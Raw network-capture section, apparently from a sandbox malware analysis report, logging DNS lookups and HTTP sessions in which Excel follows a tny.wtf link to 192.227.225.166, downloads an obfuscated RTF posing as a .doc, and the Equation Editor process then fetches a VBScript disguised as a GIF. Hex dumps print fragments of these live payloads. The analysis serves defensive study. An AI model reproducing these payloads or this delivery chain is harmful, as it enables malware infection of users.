                Jul 26, 2024 08:24:36.750919104 CEST192.168.2.228.8.8.80x989eStandard query (0)tny.wtfA (IP address)IN (0x0001)false
                Jul 26, 2024 08:24:38.537373066 CEST192.168.2.228.8.8.80x1d57Standard query (0)tny.wtfA (IP address)IN (0x0001)false
                Jul 26, 2024 08:24:38.550374985 CEST192.168.2.228.8.8.80xfd40Standard query (0)tny.wtfA (IP address)IN (0x0001)false
                Jul 26, 2024 08:24:42.380235910 CEST192.168.2.228.8.8.80x1100Standard query (0)tny.wtfA (IP address)IN (0x0001)false
                Jul 26, 2024 08:24:42.393402100 CEST192.168.2.228.8.8.80x2664Standard query (0)tny.wtfA (IP address)IN (0x0001)false
                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                Jul 26, 2024 08:24:34.541492939 CEST8.8.8.8192.168.2.220x7fcaNo error (0)tny.wtf188.114.97.3A (IP address)IN (0x0001)false
                Jul 26, 2024 08:24:34.541492939 CEST8.8.8.8192.168.2.220x7fcaNo error (0)tny.wtf188.114.96.3A (IP address)IN (0x0001)false
                Jul 26, 2024 08:24:36.760668039 CEST8.8.8.8192.168.2.220x989eNo error (0)tny.wtf188.114.97.3A (IP address)IN (0x0001)false
                Jul 26, 2024 08:24:36.760668039 CEST8.8.8.8192.168.2.220x989eNo error (0)tny.wtf188.114.96.3A (IP address)IN (0x0001)false
                Jul 26, 2024 08:24:38.548377037 CEST8.8.8.8192.168.2.220x1d57No error (0)tny.wtf188.114.97.3A (IP address)IN (0x0001)false
                Jul 26, 2024 08:24:38.548377037 CEST8.8.8.8192.168.2.220x1d57No error (0)tny.wtf188.114.96.3A (IP address)IN (0x0001)false
                Jul 26, 2024 08:24:38.561120987 CEST8.8.8.8192.168.2.220xfd40No error (0)tny.wtf188.114.97.3A (IP address)IN (0x0001)false
                Jul 26, 2024 08:24:38.561120987 CEST8.8.8.8192.168.2.220xfd40No error (0)tny.wtf188.114.96.3A (IP address)IN (0x0001)false
                Jul 26, 2024 08:24:42.391953945 CEST8.8.8.8192.168.2.220x1100No error (0)tny.wtf188.114.96.3A (IP address)IN (0x0001)false
                Jul 26, 2024 08:24:42.391953945 CEST8.8.8.8192.168.2.220x1100No error (0)tny.wtf188.114.97.3A (IP address)IN (0x0001)false
                Jul 26, 2024 08:24:42.407871962 CEST8.8.8.8192.168.2.220x2664No error (0)tny.wtf188.114.97.3A (IP address)IN (0x0001)false
                Jul 26, 2024 08:24:42.407871962 CEST8.8.8.8192.168.2.220x2664No error (0)tny.wtf188.114.96.3A (IP address)IN (0x0001)false
                • tny.wtf
                • 192.227.225.166
                • 198.46.176.133
                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                0192.168.2.2249165188.114.97.3801800C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                TimestampBytes transferredDirectionData
                Jul 26, 2024 08:24:34.562410116 CEST317OUTGET /4Gs HTTP/1.1
                Accept: */*
                UA-CPU: AMD64
                Accept-Encoding: gzip, deflate
                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                Host: tny.wtf
                Connection: Keep-Alive
                Jul 26, 2024 08:24:35.704056978 CEST732INHTTP/1.1 302 Found
                Date: Fri, 26 Jul 2024 06:24:35 GMT
                Transfer-Encoding: chunked
                Connection: keep-alive
                Location: http://192.227.225.166/36/hb/createdsimplethingstogetbackteachingentirethingsaroundtheworldtogetmebackwiththefreatgreatthings_____________sesheismygirlalwayssheismy.doc
                X-Powered-By: ASP.NET
                CF-Cache-Status: DYNAMIC
                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ewXed60uUT%2FyUukYP4nYFpcB9Z7LhQMghKFbH6UKuPE2JsOm54jT0aLYhww0hx5mDIxiornAK6v3FO3HTPAJ025PFakfUVY3d1L0Li4EmIG1PtoK68M3W5Ds"}],"group":"cf-nel","max_age":604800}
                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                Server: cloudflare
                CF-RAY: 8a924eba9f4f1859-EWR
                alt-svc: h3=":443"; ma=86400
                Data Raw: 30 0d 0a 0d 0a
                Data Ascii: 0


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                1192.168.2.2249166192.227.225.166801800C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                TimestampBytes transferredDirectionData
                Jul 26, 2024 08:24:35.717964888 CEST467OUTGET /36/hb/createdsimplethingstogetbackteachingentirethingsaroundtheworldtogetmebackwiththefreatgreatthings_____________sesheismygirlalwayssheismy.doc HTTP/1.1
                Accept: */*
                UA-CPU: AMD64
                Accept-Encoding: gzip, deflate
                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                Host: 192.227.225.166
                Connection: Keep-Alive
                Jul 26, 2024 08:24:36.201911926 CEST1236INHTTP/1.1 200 OK
                Date: Fri, 26 Jul 2024 06:24:36 GMT
                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                Last-Modified: Thu, 25 Jul 2024 02:39:01 GMT
                ETag: "16065-61e094c2e7a6c"
                Accept-Ranges: bytes
                Content-Length: 90213
                Keep-Alive: timeout=5, max=100
                Connection: Keep-Alive
                Content-Type: application/msword
                Data Raw: 7b 5c 72 74 66 31 0d 09 7b 5c 2a 5c 66 6c 64 69 6e 73 74 36 32 32 32 34 39 37 37 37 20 5c 2b 7d 0d 7b 5c 37 31 38 38 38 31 36 36 32 3e 2e 3d b5 33 3f 7e 38 60 36 21 38 36 3f 3f 3f 34 60 2d b0 27 2f 2a 36 29 30 34 2b 25 34 3e 40 a7 37 2b 29 39 3c 24 33 2e 2c 25 24 37 27 5b 2a 30 b5 2c b0 34 3f 3d 26 2d 23 3f b0 60 2a 39 30 25 3d 5b 33 28 2c 39 3f 7e 28 37 3f 5b 3c 3d 3f 3f 39 b0 3c 26 3f 27 33 25 2c 3f 5e 3e 60 35 23 35 3c 7e 3f 37 2e 3f 2a 2b 5b 3f a7 3d 32 27 35 2c 40 33 38 34 30 36 26 25 40 27 3f 28 3f 2c 2c 5f a7 39 40 31 7e 3c 2a 27 60 2b 27 30 3f 3f 3f 60 3a 38 2f 60 2f 33 3b 2d 5d 29 b0 2e 3c 32 34 3a 3f 60 3a 21 3f b0 3c 7c 36 24 60 7c 31 29 3f 5e 29 5f 5b 3c 3f 30 a7 24 7c 3f 39 3d 31 3f 5e 33 25 3e 3f 3f 3a 3c 40 3f 38 5b 30 3f 2f 2c 3a 3f 25 2d 3f 5f 30 3f 27 2c 60 3f 3f b0 25 31 60 b5 3a 3a 26 3d 3f 5d 40 5f 3d 29 2d 23 5b 2d 37 5d 28 36 35 21 7c 39 40 2b 2f 5b 37 2f 31 3e b0 37 32 2c 37 60 38 2b 3f 28 3f 28 2e 33 60 3f 37 3f 7e b0 3f 2a 31 2a 60 2a 36 2d 36 60 26 40 7e 28 2f 37 27 2f 28 [TRUNCATED]
                Data Ascii: {\rtf1{\*\fldinst622249777 \+}{\718881662>.=3?~8`6!86???4`-'/*6)04+%4>@7+)9<$3.,%$7'[*0,4?=&-#?`*90%=[3(,9?~(7?[<=??9<&?'3%,?^>`5#5<~?7.?*+[?=2'5,@38406&%@'?(?,,_9@1~<*'`+'0???`:8/`/3;-]).<24:?`:!?<|6$`|1)?^)_[<?0$|?9=1?^3%>??:<@?8[0?/,:?%-?_0?',`??%1`::&=?]@_=)-#[-7](65!|9@+/[7/1>72,7`8+?(?(.3`?7?~?*1*`*6-6`&@~(/7'/(~^%)8#4`>8;*49)??8/?`9/?|_0,*:61~:1%8`#98-6^5:?]!&5#2@!%??`4#-:+%=!3*=?5'[8,)]8?<;&4'?3[^==/%!$9`?;?8=%1?|!:(3_-<(,3106^3;;)?16?]<>6;*:%%8_|':>$2[%/9-$;@|#!/^>6%<($!%+*+~:|7_%><2=%?<~+62(?)||#:>9]~52(``07[2*;?;1?3:4+2#;%?$???9?79??!~*]&40.1?6;]?4^=%!18?&*2|[>4#_&21[/[|@@+@**9%!9$2>-!`[@@=+25+0<0?0:8@.?|<?5=%(>:%^$'4?4)?+4-@#_<#%>35;!$;!(?(-[5^]?6?6*-:??:52=-.6~)[?&|/9^46:?<<]!+|9]$6[5[]+*0?~?^]4]%~)^|.,$0,+9&^20^5)>]>;(+93|!,(|91<[.:?@'81(+&86?;_&$:.+0]!:.'(#34#>*%?22~)?:03#>10-7*0*8|<|_)^4_?$<=&&7875&=4???[%6%#][?6[?>04!2$|.(
                Jul 26, 2024 08:24:36.201997995 CEST1236INData Raw: 3c 30 21 38 23 25 32 27 5e 36 3f 40 25 24 5d 37 5b 38 2b 24 3f 2a 60 3f 28 2f 3f 30 a7 32 2d 7e 2e 2f 3f 28 2e 2f a7 3e 39 35 34 3f 3a 3f a7 3f 3e b5 2b b0 2f 34 31 b0 39 29 5f 3d 40 b5 36 32 3c 7e 36 60 5f 24 3d 60 5b 30 2f 29 30 3f 2b 36 34 24
                Data Ascii: <0!8#%2'^6?@%$]7[8+$?*`?(/?02-~./?(./>954?:??>+/419)_=@62<~6`_$=`[0/)0?+64$?#~%`&-?]~#]49?()<4|1'6%.0<9!.5-03_99?5#![%:?|%+_@:`/%^1[0%?|?8%'1='''`~!<2?:/<>:8?9,[?<6?~~:%0??4[*9^?;4|#.`9?(0|,;~.!?`@?'7?8)_7(=!.>=]5=]?3`[<|=
                Jul 26, 2024 08:24:36.202012062 CEST448INData Raw: 2b 3f 38 37 30 3f 3f 21 5b 25 5b 25 2e 28 25 3a 2e 2a 3f 3f b5 3f 32 38 3f 5e 23 3a 3d b0 7e 25 21 3f 3f 3c 5b 23 2f 38 b5 a7 5b 3a 26 23 60 35 7c 25 3f 3b 21 40 3a b5 28 40 3f 60 2d 7c 38 2a b5 5f 2d 28 a7 7e 3b 35 34 26 40 3d 2a 25 29 2c 3f 37
                Data Ascii: +?870??![%[%.(%:.*???28?^#:=~%!??<[#/8[:&#`5|%?;!@:(@?`-|8*_-(~;54&@=*%),?78,~(1:%1,.?48=?9$7%':4/7&_,,]2|-_?(5%?%-?,:?,*):%>=~|%#12=;!~~[<5;,%>:*,]*?00%%?=)5`52?!'??!0&*$.:@4?4+)/79~.~87%?]+7-/?~7$?-~,/$[=|#@/`0=@3[/!+|3:4`7,
                Jul 26, 2024 08:24:36.202529907 CEST1236INData Raw: 7e 5f 3c 2b 21 40 3f 33 3f b5 31 3f 29 7e 3d 3b 60 3f 3e 21 3f 3f 29 25 2e 2c 3e 2c 2f a7 32 3f 24 5d 5d 30 a7 2f 35 24 39 21 3f 5f 2b 2c 2f 3c 35 3a 35 3f 7c b5 28 36 29 a7 30 38 40 3e b5 36 34 3c 27 29 25 3f 60 5d 35 5e 36 34 5f 2c 2e 5d 3f 5b
                Data Ascii: ~_<+!@?3?1?)~=;`?>!??)%.,>,/2?$]]0/5$9!?_+,/<5:5?|(6)08@>64<')%?`]5^64_,.]?[+90?[[]49%84;1&9%?87?*2=|&40=@|||@98:7^,)~?8]6?0&?]2!`@//?#9,-6#7>|^&%7%='.;>#2%#0,_@.9#??!+`4?_:<61[?3.|^9.6;1[?;@#!;;[_;!:57&-|/_=]5*9?|&,:,6.`2?-.
                Jul 26, 2024 08:24:36.202543020 CEST1236INData Raw: 25 2d b0 7c a7 5e 25 3f 3c 5e 28 24 39 40 3f 25 3c 32 3b b0 7e 5e 3c 39 3f 3f 5d 28 29 37 31 7e 2d 2b 3a 29 25 3b 3f b5 b0 3f 27 31 32 3f 3f b0 b0 7e 37 3e 28 33 29 3a 3e 34 2f 3b 31 b5 7e b5 32 39 24 2a 39 3a 5d 25 5e a7 b5 33 3d 35 3f 3a 29 7e
                Data Ascii: %-|^%?<^($9@?%<2;~^<9??]()71~-+:)%;??'12??~7>(3):>4/;1~29$*9:]%^3=5?:)~2(~&2?,1?_^_%`26,-&0%]~||<6=71;7_!@=1?(44?]1_(2?<*818%-34=>1_[##=/[]:3=4?='~1(;^/><;94_~41|81-=|?*.!+#|_(!8??*#&?^?('=,~*2@6:&54.60381.2'6;8&57_[&?,3'*[?,
                Jul 26, 2024 08:24:36.203207016 CEST1236INData Raw: 26 30 3f 3e 2d 25 2f 32 3f 5e 5f 7e 7c b0 21 3a 35 36 21 5b 25 27 3f 24 3f 5f 34 28 24 28 5b 60 2f 33 3d 3d 38 23 3e 40 b0 3a 31 25 39 2a 32 3f 31 5b 27 2d 2c 3e a7 3f 3f 25 60 7c 3e 33 39 2c 3f 23 27 25 3f 3c 30 25 a7 3b 3f 3f 40 26 35 27 3b 34
                Data Ascii: &0?>-%/2?^_~|!:56![%'?$?_4($([`/3==8#>@:1%9*2?1['-,>??%`|>39,?#'%?<0%;??@&5';4]'95:;31_':=</+[5?':#(1`%6|5+$39/9`9;]#?5081?7!`^|/?%;13?07%|.<2~~'+'=+@8=??%+/|3,||3$??9?!@`7+@&&3!3(/,$,^^;_%:/><`'29/0<^%$9+2$]$[?_>(3/]_7%0<+4@2
                Jul 26, 2024 08:24:36.203217983 CEST1236INData Raw: 5c 2a 5c 6c 69 6e 65 46 69 6c 6c 48 65 69 67 68 74 36 36 30 33 34 38 35 38 39 20 5c 62 69 6e 30 30 30 30 30 30 30 5c 31 35 34 34 30 37 33 37 37 38 34 33 35 33 32 31 34 30 7d 0d 5c 68 79 70 68 63 6f 6e 73 65 63 38 39 34 36 30 34 30 36 38 39 31 35
                Data Ascii: \*\lineFillHeight660348589 \bin0000000\154407377843532140}\hyphconsec89460406891532\ignoremixedcontent823738787\'? {\object\YDRQFKZUSKTIYJZLMNPRQPWRRbi
                Jul 26, 2024 08:24:36.203974009 CEST1236INData Raw: 35 36 31 35 09 20 20 20 20 09 09 09 20 20 20 20 09 09 20 20 20 09 09 20 20 20 20 09 09 20 09 09 20 09 20 20 09 20 09 20 09 20 09 20 09 20 20 20 20 20 20 09 20 09 09 20 20 09 09 20 09 20 09 20 20 20 09 20 20 20 20 20 34 09 20 20 09 09 20 20 09 09
                Data Ascii: 5615 4 494 f6e
                Jul 26, 2024 08:24:36.203985929 CEST1236INData Raw: 20 20 09 09 09 20 20 09 09 09 09 20 20 20 20 09 09 09 09 09 09 20 09 20 09 09 20 20 20 20 09 09 09 20 20 20 09 20 20 20 20 20 31 33 09 09 20 09 09 20 20 20 09 20 09 09 09 09 20 09 20 20 09 20 09 09 20 09 20 20 09 20 20 09 20 09 09 20 09 20 09 09
                Data Ascii: 13 d9 7
                Jul 26, 2024 08:24:36.204713106 CEST1236INData Raw: 09 20 20 09 09 09 20 09 20 09 09 20 09 09 09 20 09 09 09 09 20 09 09 20 09 20 09 20 20 20 31 20 20 20 09 09 09 09 09 09 20 09 09 20 09 20 20 20 20 20 20 09 09 20 09 09 20 09 20 20 09 20 09 20 20 20 20 20 20 09 20 20 20 09 09 20 20 09 09 20 20 09
                Data Ascii: 1 2b e1a08
                Jul 26, 2024 08:24:36.207916021 CEST1236INData Raw: 09 20 20 09 09 20 09 20 09 20 20 20 20 09 20 09 20 09 09 09 20 09 20 09 20 09 09 09 09 09 09 09 20 09 09 09 20 09 20 20 20 20 20 09 09 20 20 09 09 09 09 20 20 20 20 09 09 20 09 20 09 20 20 20 66 0a 0a 0d 0d 0d 0a 0d 0a 0a 0d 0d 0d 0d 0d 0d 0a 0a
                Data Ascii: f88a2d a2


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                2192.168.2.2249167188.114.97.3801536C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                TimestampBytes transferredDirectionData
                Jul 26, 2024 08:24:36.769563913 CEST129OUTOPTIONS / HTTP/1.1
                User-Agent: Microsoft Office Protocol Discovery
                Host: tny.wtf
                Content-Length: 0
                Connection: Keep-Alive
                Jul 26, 2024 08:24:37.342529058 CEST560INHTTP/1.1 404 Not Found
                Date: Fri, 26 Jul 2024 06:24:37 GMT
                Transfer-Encoding: chunked
                Connection: keep-alive
                X-Powered-By: ASP.NET
                CF-Cache-Status: DYNAMIC
                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4GKbrAxCyu4ckcdd7iAo6Tcgp03XtmVNauhTW%2BRSmJpBVdfbISz3z5H2VVSfWhvepwJdddiwDm9DpAxY3Ws6PRi8spA%2FrtdxjnFTBUTzYy8GJUBV%2BIz55ISJ"}],"group":"cf-nel","max_age":604800}
                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                Server: cloudflare
                CF-RAY: 8a924ec87aa64313-EWR
                alt-svc: h3=":443"; ma=86400
                Data Raw: 30 0d 0a 0d 0a
                Data Ascii: 0
                Jul 26, 2024 08:24:38.038249969 CEST129OUTOPTIONS / HTTP/1.1
                User-Agent: Microsoft Office Protocol Discovery
                Host: tny.wtf
                Content-Length: 0
                Connection: Keep-Alive
                Jul 26, 2024 08:24:38.185475111 CEST562INHTTP/1.1 404 Not Found
                Date: Fri, 26 Jul 2024 06:24:38 GMT
                Transfer-Encoding: chunked
                Connection: keep-alive
                X-Powered-By: ASP.NET
                CF-Cache-Status: DYNAMIC
                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pjeXUPP%2Byx8OMG9N9HzL4IZTz%2BAwP%2F99bGilspcytz3uC41pT1xHW0iGDns6WkkaU5sfrWoXXHX3lCgvV%2BmMaZbTfvy7vrlEBPsIDJbqb323zERZW0REjqej"}],"group":"cf-nel","max_age":604800}
                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                Server: cloudflare
                CF-RAY: 8a924ece0d584313-EWR
                alt-svc: h3=":443"; ma=86400
                Data Raw: 30 0d 0a 0d 0a
                Data Ascii: 0
                Jul 26, 2024 08:24:38.324079037 CEST129OUTOPTIONS / HTTP/1.1
                User-Agent: Microsoft Office Protocol Discovery
                Host: tny.wtf
                Content-Length: 0
                Connection: Keep-Alive
                Jul 26, 2024 08:24:38.474283934 CEST562INHTTP/1.1 404 Not Found
                Date: Fri, 26 Jul 2024 06:24:38 GMT
                Transfer-Encoding: chunked
                Connection: keep-alive
                X-Powered-By: ASP.NET
                CF-Cache-Status: DYNAMIC
                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NG6Uq5267NqFBP7Uub3HfRj4kZlEOxPXgjo9NgxscAhjB9krNmL4T4ik3i%2Ba%2Fy%2B9KqKrheMllf%2F9tTMRzp7hmj59rUpKPJ5N9H0vyULV3EKq6syPPsRVGHKi"}],"group":"cf-nel","max_age":604800}
                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                Server: cloudflare
                CF-RAY: 8a924ecfde454313-EWR
                alt-svc: h3=":443"; ma=86400
                Data Raw: 30 0d 0a 0d 0a
                Data Ascii: 0
                Jul 26, 2024 08:24:43.100250006 CEST130OUTHEAD /4Gs HTTP/1.1
                User-Agent: Microsoft Office Existence Discovery
                Host: tny.wtf
                Content-Length: 0
                Connection: Keep-Alive
                Jul 26, 2024 08:24:43.247272015 CEST546INHTTP/1.1 405 Method Not Allowed
                Date: Fri, 26 Jul 2024 06:24:43 GMT
                Connection: keep-alive
                Allow: GET
                X-Powered-By: ASP.NET
                CF-Cache-Status: DYNAMIC
                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EWfjIOqD49UtDD%2B9zulgZ3pBQ14b4qouGUqoZW7%2Fs15Q6wHUxJXT8uXmzevHP2aH2f6g3jaUIvaCDSANNBu2ePqsQDtlBoCEHwB09pYw0LvFDI65h8WPE8w8"}],"group":"cf-nel","max_age":604800}
                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                Server: cloudflare
                CF-RAY: 8a924eedae454313-EWR
                alt-svc: h3=":443"; ma=86400


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                3192.168.2.2249168188.114.97.3801536C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                TimestampBytes transferredDirectionData
                Jul 26, 2024 08:24:38.567225933 CEST111OUTHEAD /4Gs HTTP/1.1
                Connection: Keep-Alive
                User-Agent: Microsoft Office Existence Discovery
                Host: tny.wtf
                Jul 26, 2024 08:24:39.137139082 CEST560INHTTP/1.1 405 Method Not Allowed
                Date: Fri, 26 Jul 2024 06:24:39 GMT
                Connection: keep-alive
                Allow: GET
                X-Powered-By: ASP.NET
                CF-Cache-Status: DYNAMIC
                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TSDeyAVRlkEwCH8%2BmMJDygHfI7%2Fx%2B5AkeYrdQGsjIPM%2BTX0BNONLEJrXj7s99lSv%2BeJuyBe%2B86Xml89p%2Fy%2FNFgO3Z8yLgew351HS0HL2kEb6SRQoz6%2B3wyji"}],"group":"cf-nel","max_age":604800}
                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                Server: cloudflare
                CF-RAY: 8a924ed3af7342cf-EWR
                alt-svc: h3=":443"; ma=86400
                Jul 26, 2024 08:24:39.346111059 CEST560INHTTP/1.1 405 Method Not Allowed
                Date: Fri, 26 Jul 2024 06:24:39 GMT
                Connection: keep-alive
                Allow: GET
                X-Powered-By: ASP.NET
                CF-Cache-Status: DYNAMIC
                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TSDeyAVRlkEwCH8%2BmMJDygHfI7%2Fx%2B5AkeYrdQGsjIPM%2BTX0BNONLEJrXj7s99lSv%2BeJuyBe%2B86Xml89p%2Fy%2FNFgO3Z8yLgew351HS0HL2kEb6SRQoz6%2B3wyji"}],"group":"cf-nel","max_age":604800}
                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                Server: cloudflare
                CF-RAY: 8a924ed3af7342cf-EWR
                alt-svc: h3=":443"; ma=86400


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                4192.168.2.2249170192.227.225.166803248C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                TimestampBytes transferredDirectionData
                Jul 26, 2024 08:24:43.835028887 CEST338OUTGET /36/simplebeautygirlfrndhaveforme.gIF HTTP/1.1
                Accept: */*
                Accept-Encoding: gzip, deflate
                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                Host: 192.227.225.166
                Connection: Keep-Alive
                Jul 26, 2024 08:24:44.360832930 CEST1236INHTTP/1.1 200 OK
                Date: Fri, 26 Jul 2024 06:24:44 GMT
                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                Last-Modified: Thu, 25 Jul 2024 11:02:56 GMT
                ETag: "65868-61e10565301a5"
                Accept-Ranges: bytes
                Content-Length: 415848
                Keep-Alive: timeout=5, max=100
                Connection: Keep-Alive
                Content-Type: image/gif
                Data Raw: ff fe 27 00 0d 00 0a 00 27 00 20 00 43 00 6f 00 70 00 79 00 72 00 69 00 67 00 68 00 74 00 20 00 28 00 63 00 29 00 20 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 20 00 43 00 6f 00 72 00 70 00 6f 00 72 00 61 00 74 00 69 00 6f 00 6e 00 2e 00 20 00 20 00 41 00 6c 00 6c 00 20 00 72 00 69 00 67 00 68 00 74 00 73 00 20 00 72 00 65 00 73 00 65 00 72 00 76 00 65 00 64 00 2e 00 0d 00 0a 00 27 00 0d 00 0a 00 27 00 20 00 56 00 42 00 53 00 63 00 72 00 69 00 70 00 74 00 20 00 53 00 6f 00 75 00 72 00 63 00 65 00 20 00 46 00 69 00 6c 00 65 00 0d 00 0a 00 27 00 0d 00 0a 00 27 00 20 00 53 00 63 00 72 00 69 00 70 00 74 00 20 00 4e 00 61 00 6d 00 65 00 3a 00 20 00 77 00 69 00 6e 00 72 00 6d 00 2e 00 76 00 62 00 73 00 0d 00 0a 00 27 00 0d 00 0a 00 0d 00 0a 00 4f 00 70 00 74 00 69 00 6f 00 6e 00 20 00 45 00 78 00 70 00 6c 00 69 00 63 00 69 00 74 00 0d 00 0a 00 0d 00 0a 00 27 00 27 00 27 00 27 00 27 00 27 00 27 00 27 00 27 00 27 00 27 00 27 00 27 00 27 00 27 00 27 00 27 00 27 00 27 00 27 00 27 00 0d 00 0a 00 [TRUNCATED]
                Data Ascii: '' Copyright (c) Microsoft Corporation. All rights reserved.'' VBScript Source File'' Script Name: winrm.vbs'Option Explicit'''''''''''''''''''''' Error codesprivate const ERR_OK = 0private const lampejante = 1'''''''''''''''''''''' Messagesprivate const L_ONLYCSCRIPT_Message = "Can be executed only by cscript.exe."private const L_UNKOPNM_Message = "Unknown operation name: "private const L_OP_
                Jul 26, 2024 08:24:44.360934019 CEST224INData Raw: 4d 00 65 00 73 00 73 00 61 00 67 00 65 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 3d 00 20 00 22 00 4f 00 70 00 65 00 72 00 61 00 74 00 69 00 6f 00 6e 00 20 00 2d 00 20 00 22 00 0d 00 0a 00 70 00 72 00
                Data Ascii: Message = "Operation - "private const L_NOFILE_Message = "File does not exist: "privat
                Jul 26, 2024 08:24:44.360946894 CEST1236INData Raw: 65 00 20 00 63 00 6f 00 6e 00 73 00 74 00 20 00 4c 00 5f 00 50 00 41 00 52 00 5a 00 45 00 52 00 4f 00 5f 00 4d 00 65 00 73 00 73 00 61 00 67 00 65 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 3d 00 20 00 22 00 50 00 61 00 72 00 61 00
                Data Ascii: e const L_PARZERO_Message = "Parameter is zero length #"private const L_INVOPT_ErrorMessage = "Switch not al
                Jul 26, 2024 08:24:44.361383915 CEST1236INData Raw: 45 00 72 00 72 00 6f 00 72 00 4d 00 65 00 73 00 73 00 61 00 67 00 65 00 20 00 3d 00 20 00 22 00 41 00 20 00 71 00 75 00 6f 00 74 00 65 00 64 00 20 00 70 00 61 00 72 00 61 00 6d 00 65 00 74 00 65 00 72 00 20 00 76 00 61 00 6c 00 75 00 65 00 20 00
                Data Ascii: ErrorMessage = "A quoted parameter value must begin and end with quotes: "private const L_BADMATCNT1_Message = "Une
                Jul 26, 2024 08:24:44.361397028 CEST448INData Raw: 61 00 74 00 65 00 20 00 63 00 6f 00 6e 00 73 00 74 00 20 00 4c 00 5f 00 49 00 4e 00 56 00 57 00 4d 00 49 00 55 00 52 00 49 00 32 00 5f 00 4d 00 65 00 73 00 73 00 61 00 67 00 65 00 20 00 20 00 20 00 20 00 20 00 20 00 3d 00 20 00 22 00 49 00 6e 00
                Data Ascii: ate const L_INVWMIURI2_Message = "Invalid WMI resource URI - only one '/' found (at least 2 expected)"private const
                Jul 26, 2024 08:24:44.361865044 CEST1236INData Raw: 74 00 20 00 4c 00 5f 00 48 00 61 00 73 00 68 00 53 00 79 00 6e 00 74 00 61 00 78 00 5f 00 45 00 72 00 72 00 6f 00 72 00 4d 00 65 00 73 00 73 00 61 00 67 00 65 00 20 00 3d 00 20 00 22 00 53 00 79 00 6e 00 74 00 61 00 78 00 20 00 45 00 72 00 72 00
                Data Ascii: t L_HashSyntax_ErrorMessage = "Syntax Error: input must be of the form {KEY=""VALUE""[;KEY=""VALUE""]}"private const L_A
                Jul 26, 2024 08:24:44.361879110 CEST1236INData Raw: 6d 00 61 00 74 00 20 00 6d 00 65 00 73 00 73 00 61 00 67 00 65 00 2e 00 20 00 52 00 61 00 77 00 2c 00 20 00 75 00 6e 00 66 00 6f 00 72 00 6d 00 61 00 74 00 74 00 65 00 64 00 2c 00 20 00 6d 00 65 00 73 00 73 00 61 00 67 00 65 00 3a 00 20 00 22 00
                Data Ascii: mat message. Raw, unformatted, message: "private const L_PUT_PARAM_NOMATCH_Message = "Parameter name does not match any
                Jul 26, 2024 08:24:44.362653971 CEST1236INData Raw: 6f 00 72 00 6d 00 65 00 64 00 2e 00 22 00 0d 00 0a 00 70 00 72 00 69 00 76 00 61 00 74 00 65 00 20 00 63 00 6f 00 6e 00 73 00 74 00 20 00 4c 00 5f 00 52 00 45 00 53 00 4f 00 55 00 52 00 43 00 45 00 4c 00 4f 00 43 00 41 00 54 00 4f 00 52 00 5f 00
                Data Ascii: ormed."private const L_RESOURCELOCATOR_Message = "Unable to create ResourceLocator object."private const L_PUT_PARAM_N
                Jul 26, 2024 08:24:44.362668037 CEST672INData Raw: 70 00 61 00 6c 00 6d 00 6f 00 20 00 75 00 70 00 64 00 61 00 74 00 65 00 20 00 69 00 6e 00 73 00 74 00 72 00 75 00 63 00 74 00 69 00 6f 00 6e 00 73 00 20 00 69 00 6e 00 20 00 61 00 6e 00 61 00 6c 00 79 00 73 00 69 00 73 00 20 00 72 00 65 00 73 00
                Data Ascii: palmo update instructions in analysis result."private const L_QuickConfigUpdated_Message = "WinRM has been updated for r
                Jul 26, 2024 08:24:44.363354921 CEST1236INData Raw: 6e 00 67 00 20 00 69 00 73 00 20 00 65 00 6e 00 61 00 62 00 6c 00 65 00 64 00 2e 00 22 00 0d 00 0a 00 70 00 72 00 69 00 76 00 61 00 74 00 65 00 20 00 63 00 6f 00 6e 00 73 00 74 00 20 00 4c 00 5f 00 51 00 75 00 69 00 63 00 6b 00 43 00 6f 00 6e 00
